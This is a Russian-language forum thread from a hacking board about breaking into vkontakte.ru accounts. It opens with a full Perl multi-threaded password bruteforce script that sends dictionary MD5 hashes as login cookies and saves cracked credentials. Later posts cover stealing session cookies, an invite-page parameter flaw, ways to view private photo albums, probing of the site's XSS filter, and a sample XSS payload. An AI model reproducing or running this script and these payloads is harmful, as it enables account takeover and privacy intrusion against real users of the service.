так как народ стучит в аську и спрашивает почему не работает скрипт, выкладываю исправленную версию, так как баг с куками прикрыли теперь нужно знать мыло Code: #!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ########################################## # C!klodoL # vkontakte.ru bruteforce with multi-threads ########################################## $dic = 'pass.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ########################################## open (pass, "<$dic"); Next: @pass = pass(); for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while (<pass>){ push @mas, $_; last if (@mas > 500); } chomp @mas; return @mas; } сегодня заметил что у павлика миранда даже ip не скрывает 8)
Можно украсть cookies пользователя и поставить их на свою машину, как это сделано на примере mail.ru. Только как их тиснуть?
Нашел пару ошибок: http://vkontakte.ru/invite.php?m=1&email[]=&first_name[]=&last_name[]= Параметр "m" можно указать самому http://vkontakte.ru/invite.php?m=2&email[]=&first_name[]=&last_name[]= http://vkontakte.ru/invite.php?m=3&email[]=&first_name[]=&last_name[]= http://vkontakte.ru/invite.php?m=4&email[]=&first_name[]=&last_name[]= + при ретриве пасса на мыло можно указать что угодно,и будет показано сообщение об успешной отправке ) В принципе ничего серьезного,так мелочи
а никто не задумывался как смотреть закрытые альбомы? ведь если просто так жипегу он показывает значит ничего такого сильно сложного тама нет... вопрос только как к самой пикче подобраться
Там есть группа <script language="JavaScript">alert("xak")</script>. Они этот вопрос поднимали уже. Поищи в обсуждениях
не совсем так можно было смотреть альбомы у закрытых анкет, т.е. если анкета закрыта для все кроме какой то группы то альбомы этой анкеты увидеть можно было, но недавно прикрыли и это... однако если в превьюхе закрытого альбома есть пикча, то можно эту картинку увидеть в нормальном размере, достаточно изменить в названии картинки m на x, но тут возникает вопрос как смотреть дальше то... ибо имена картинок идут непонятно как... сдается мне что используется в именовании чтото типа хэширования или чего то подобного.. но вот как это для того чтобы раскрутить всю цепочку... это вопрос...
вообще там очень интересная фильтрация 1)если написать в тексте на стене && (или ++), причём даже если не подряд, то после второго символа &(+), все удалится вместе с ним 2)потом бывает фигня что когда запишешь что-то типа &!&!&! то выводится сообщение:"Ваше сообщение добавлено", которое закрывает всю стену, после обновления этого сообщения вообще нет, но это бывает не всегда 3)если написать javascript то фильтр изменит это на javas?1?ript 4)если шифровать javascript в url системе то выведется %6Aavascript 5)если написать только // то оно не выводится, хотя пишут, что сообщение отправлено, наверно это связано с автоопределением ссылки вот так вот, так что они там нехилую фильтрацию поставили=)
мона просто сделать PHP: hekscript:alert(/xss/) тока вот это тока в ие будет работать) PS странно, в фф тож сработало)
